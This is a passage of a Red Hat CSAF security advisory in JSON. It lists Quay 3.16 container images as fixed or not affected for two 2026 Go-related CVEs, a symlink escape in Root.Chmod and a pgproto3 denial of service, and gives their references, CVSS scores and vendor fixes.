          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456336",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456336"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32282",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/763761",
          "url": "https://go.dev/cl/763761"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78293",
          "url": "https://go.dev/issue/78293"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4864",
          "url": "https://pkg.go.dev/vuln/GO-2026-4864"
        }
      ],
      "release_date": "2026-04-08T01:06:55.953000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root"
    },
    {
      "cve": "CVE-2026-32286",
      "cwe": {
        "id": "CWE-1285",
        "name": "Improper Validation of Specified Index, Position, or Offset in Input"
      },
      "discovery_date": "2026-03-26T20:01:59.226117+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2451847"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the DataRow.Decode function within the github.com/jackc/pgproto3/v2 component. A malicious or compromised PostgreSQL server can exploit this by sending a DataRow message containing a negative field length. This improper validation of field lengths leads to a \"slice bounds out of range panic\", resulting in a Denial of Service (DoS) for the affected application.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "github.com/jackc/pgproto3/v2: github.com/jackc/pgproto3/v2: Denial of Service via malicious PostgreSQL server",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "The PostgreSQL server multicluster-globalhub-manager connects to is either provisioned by the operator itself or specified by the admin managing the deployment. To successfully exploit the vulnerability in this context the attacker would need to compromise the operator-deployed PostgreSQL server to force a crafted malicious DataRow message or they would need to have the privileges required to modify the operator-provisioned deployment or configure globalhub-manager to use a compromised/malicious \u201cBYO Postgres\u201d server.\n\nThe first scenario (compromising a legitimate PostgreSQL server) would change Attack Complexity from Low to High resulting in an adjusted CVSS v3.1 score of 5.9 (Moderate)\nThe other scenarios (manipulating the operator provisioned-deployment or configuring the globalhub-manager to use a malicious server) would maintain AC:L but would require privileged access. This would change Privileges Required from None to High resulting in an adjusted CVSS v3.1 score of 4.9 (Moderate)\n\nBased on the above the Impact Rating for multicluster-globalhub-manager-rhel9 is  Moderate.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32286"
        },
        {
          "category": "external",
          "summary": "RHBZ#2451847",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451847"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32286",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32286"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32286",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32286"
        },
        {
          "category": "external",
          "summary": "https://github.com/golang/vulndb/issues/4518",
          "url": "https://github.com/golang/vulndb/issues/4518"
        },
        {
          "category": "external",
          "summary": "https://github.com/jackc/pgx/issues/2507",
          "url": "https://github.com/jackc/pgx/issues/2507"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4518",
          "url": "https://pkg.go.dev/vuln/GO-2026-4518"
        }
      ],
      "release_date": "2026-03-26T19:40:51.974000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
